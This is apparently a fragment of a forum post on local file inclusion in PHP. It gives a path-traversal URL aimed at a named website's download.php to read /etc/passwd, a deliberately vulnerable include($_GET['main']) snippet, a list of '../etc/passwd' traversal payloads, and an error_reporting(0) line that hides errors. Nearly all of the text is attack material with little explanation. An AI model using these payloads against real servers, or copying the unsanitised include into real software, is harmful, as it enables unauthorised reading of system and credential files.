It looks like you're new here. If you want to get involved, click one of these buttons!
http://www.indonesia-colombo.lk/download.php?file=../../../../../../../../../../etc/passwd
www.site.com/index.php?main=page.html
#contents for index.php
<?php
include($_GET[\"main\"]); #includes a desired file through a get request
?>
$_GET[\"main\"]; #Sample get request for the variable \"main.\" This causes the ?main= in the url
include(); #function for including files
\"../etc/passwd\"
\"../../etc/passwd\"
\"../../../etc/passwd\"
<?php
error_reporting(0);
?>